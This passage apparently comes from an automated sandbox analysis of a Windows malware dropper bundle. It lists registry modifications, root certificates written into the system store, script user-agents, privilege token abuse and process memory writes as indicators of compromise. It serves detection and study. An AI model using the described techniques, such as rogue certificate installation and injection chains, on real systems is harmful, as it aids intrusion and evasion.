Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0351fddf69aed701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = eda47e9320aed701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24}\1 = "5640"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64}	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000004d44119add45fe94173d4e9d366309a825cd06b061fbf125a22c36c7de6448943458a5ac26aa43ee4f30f92cdf29753be69944f35c36cf1f389c556583b554936985a8b06ec3df407104b4f71717dbc49a23190aa5fa8444c058	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun19262b9e49ad.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun19262b9e49ad.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	92	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	151	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1516	setup_2.exe
1516	setup_2.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
4644	powershell.exe
4644	powershell.exe
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
4900	7574743.scr
4900	7574743.scr
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
2296	Process not Found
4916	WerFault.exe
4916	WerFault.exe
4916	WerFault.exe
4916	WerFault.exe
4916	WerFault.exe
4916	WerFault.exe
4916	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2296	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1516	setup_2.exe
7712	MicrosoftEdgeCP.exe
7712	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	964	Sun19262b9e49ad.exe
Token: SeAssignPrimaryTokenPrivilege	964	Sun19262b9e49ad.exe
Token: SeLockMemoryPrivilege	964	Sun19262b9e49ad.exe
Token: SeIncreaseQuotaPrivilege	964	Sun19262b9e49ad.exe
Token: SeMachineAccountPrivilege	964	Sun19262b9e49ad.exe
Token: SeTcbPrivilege	964	Sun19262b9e49ad.exe
Token: SeSecurityPrivilege	964	Sun19262b9e49ad.exe
Token: SeTakeOwnershipPrivilege	964	Sun19262b9e49ad.exe
Token: SeLoadDriverPrivilege	964	Sun19262b9e49ad.exe
Token: SeSystemProfilePrivilege	964	Sun19262b9e49ad.exe
Token: SeSystemtimePrivilege	964	Sun19262b9e49ad.exe
Token: SeProfSingleProcessPrivilege	964	Sun19262b9e49ad.exe
Token: SeIncBasePriorityPrivilege	964	Sun19262b9e49ad.exe
Token: SeCreatePagefilePrivilege	964	Sun19262b9e49ad.exe
Token: SeCreatePermanentPrivilege	964	Sun19262b9e49ad.exe
Token: SeBackupPrivilege	964	Sun19262b9e49ad.exe
Token: SeRestorePrivilege	964	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	404	Sun191101c1aaa.exe
Token: SeShutdownPrivilege	964	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	964	Sun19262b9e49ad.exe
Token: SeAuditPrivilege	964	Sun19262b9e49ad.exe
Token: SeSystemEnvironmentPrivilege	964	Sun19262b9e49ad.exe
Token: SeChangeNotifyPrivilege	964	Sun19262b9e49ad.exe
Token: SeRemoteShutdownPrivilege	964	Sun19262b9e49ad.exe
Token: SeUndockPrivilege	964	Sun19262b9e49ad.exe
Token: SeSyncAgentPrivilege	964	Sun19262b9e49ad.exe
Token: SeEnableDelegationPrivilege	964	Sun19262b9e49ad.exe
Token: SeManageVolumePrivilege	964	Sun19262b9e49ad.exe
Token: SeImpersonatePrivilege	964	Sun19262b9e49ad.exe
Token: SeCreateGlobalPrivilege	964	Sun19262b9e49ad.exe
Token: 31	964	Sun19262b9e49ad.exe
Token: 32	964	Sun19262b9e49ad.exe
Token: 33	964	Sun19262b9e49ad.exe
Token: 34	964	Sun19262b9e49ad.exe
Token: 35	964	Sun19262b9e49ad.exe
Token: SeDebugPrivilege	1184	Sun19e4ade31b2a.exe
Token: SeDebugPrivilege	504	Sun195a1614ec24e6a.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	1836	Sun198361825f4.exe
Token: SeDebugPrivilege	4768	2.exe
Token: SeDebugPrivilege	4484	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	5100	4111071.scr
Token: SeShutdownPrivilege	2296	Process not Found
Token: SeCreatePagefilePrivilege	2296	Process not Found
Token: SeDebugPrivilege	4392	5.exe
Token: SeShutdownPrivilege	2296	Process not Found
Token: SeCreatePagefilePrivilege	2296	Process not Found
Token: SeShutdownPrivilege	2296	Process not Found
Token: SeCreatePagefilePrivilege	2296	Process not Found
Token: SeShutdownPrivilege	2296	Process not Found
Token: SeCreatePagefilePrivilege	2296	Process not Found
Token: SeShutdownPrivilege	2296	Process not Found
Token: SeCreatePagefilePrivilege	2296	Process not Found
Token: SeRestorePrivilege	4916	WerFault.exe
Token: SeBackupPrivilege	4916	WerFault.exe
Token: SeDebugPrivilege	4640	5262791.scr
Token: SeShutdownPrivilege	2296	Process not Found
Token: SeCreatePagefilePrivilege	2296	Process not Found
Token: SeShutdownPrivilege	2296	Process not Found
Token: SeCreatePagefilePrivilege	2296	Process not Found
Token: SeDebugPrivilege	4208	LivelyScreenRecF18.exe
Token: SeShutdownPrivilege	2296	Process not Found
Token: SeCreatePagefilePrivilege	2296	Process not Found
Token: SeShutdownPrivilege	2296	Process not Found

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
6452	ultramediaburner.tmp
2840	installer.exe
2296	Process not Found
2296	Process not Found

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2296	Process not Found
6636	MicrosoftEdge.exe
7712	MicrosoftEdgeCP.exe
7712	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4464 wrote to memory of 4448	4464	setup_x86_x64_install.exe	71
PID 4464 wrote to memory of 4448	4464	setup_x86_x64_install.exe	71
PID 4464 wrote to memory of 4448	4464	setup_x86_x64_install.exe	71
PID 4448 wrote to memory of 4056	4448	setup_installer.exe	72
PID 4448 wrote to memory of 4056	4448	setup_installer.exe	72
PID 4448 wrote to memory of 4056	4448	setup_installer.exe	72
PID 4056 wrote to memory of 4692	4056	setup_install.exe	75
PID 4056 wrote to memory of 4692	4056	setup_install.exe	75
PID 4056 wrote to memory of 4692	4056	setup_install.exe	75
PID 4056 wrote to memory of 4792	4056	setup_install.exe	76
PID 4056 wrote to memory of 4792	4056	setup_install.exe	76
PID 4056 wrote to memory of 4792	4056	setup_install.exe	76
PID 4056 wrote to memory of 4844	4056	setup_install.exe	79
PID 4056 wrote to memory of 4844	4056	setup_install.exe	79
PID 4056 wrote to memory of 4844	4056	setup_install.exe	79
PID 4056 wrote to memory of 4840	4056	setup_install.exe	77
PID 4056 wrote to memory of 4840	4056	setup_install.exe	77
PID 4056 wrote to memory of 4840	4056	setup_install.exe	77
PID 4056 wrote to memory of 4896	4056	setup_install.exe	78
PID 4056 wrote to memory of 4896	4056	setup_install.exe	78
PID 4056 wrote to memory of 4896	4056	setup_install.exe	78
PID 4056 wrote to memory of 4784	4056	setup_install.exe	80
PID 4056 wrote to memory of 4784	4056	setup_install.exe	80
PID 4056 wrote to memory of 4784	4056	setup_install.exe	80
PID 4056 wrote to memory of 4796	4056	setup_install.exe	81
PID 4056 wrote to memory of 4796	4056	setup_install.exe	81
PID 4056 wrote to memory of 4796	4056	setup_install.exe	81
PID 4056 wrote to memory of 3172	4056	setup_install.exe	82
PID 4056 wrote to memory of 3172	4056	setup_install.exe	82
PID 4056 wrote to memory of 3172	4056	setup_install.exe	82
PID 4056 wrote to memory of 2940	4056	setup_install.exe	83
PID 4056 wrote to memory of 2940	4056	setup_install.exe	83
PID 4056 wrote to memory of 2940	4056	setup_install.exe	83
PID 4056 wrote to memory of 424	4056	setup_install.exe	84
PID 4056 wrote to memory of 424	4056	setup_install.exe	84
PID 4056 wrote to memory of 424	4056	setup_install.exe	84
PID 4056 wrote to memory of 524	4056	setup_install.exe	85
PID 4056 wrote to memory of 524	4056	setup_install.exe	85
PID 4056 wrote to memory of 524	4056	setup_install.exe	85
PID 4056 wrote to memory of 664	4056	setup_install.exe	86
PID 4056 wrote to memory of 664	4056	setup_install.exe	86
PID 4056 wrote to memory of 664	4056	setup_install.exe	86
PID 4056 wrote to memory of 820	4056	setup_install.exe	87
PID 4056 wrote to memory of 820	4056	setup_install.exe	87
PID 4056 wrote to memory of 820	4056	setup_install.exe	87
PID 3172 wrote to memory of 404	3172	cmd.exe	88
PID 3172 wrote to memory of 404	3172	cmd.exe	88
PID 664 wrote to memory of 504	664	cmd.exe	89
PID 664 wrote to memory of 504	664	cmd.exe	89
PID 664 wrote to memory of 504	664	cmd.exe	89
PID 4796 wrote to memory of 1068	4796	cmd.exe	90
PID 4796 wrote to memory of 1068	4796	cmd.exe	90
PID 4796 wrote to memory of 1068	4796	cmd.exe	90
PID 4896 wrote to memory of 1184	4896	cmd.exe	91
PID 4896 wrote to memory of 1184	4896	cmd.exe	91
PID 524 wrote to memory of 1332	524	cmd.exe	94
PID 524 wrote to memory of 1332	524	cmd.exe	94
PID 524 wrote to memory of 1332	524	cmd.exe	94
PID 2940 wrote to memory of 1388	2940	cmd.exe	92
PID 2940 wrote to memory of 1388	2940	cmd.exe	92
PID 2940 wrote to memory of 1388	2940	cmd.exe	92
PID 4784 wrote to memory of 1516	4784	cmd.exe	121
PID 4784 wrote to memory of 1516	4784	cmd.exe	121
PID 4784 wrote to memory of 1516	4784	cmd.exe	121

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1084

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Modifies registry class
PID:2376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:5064
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:5460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2660
- C:\Windows\system32\wbem\WMIADAP.EXE
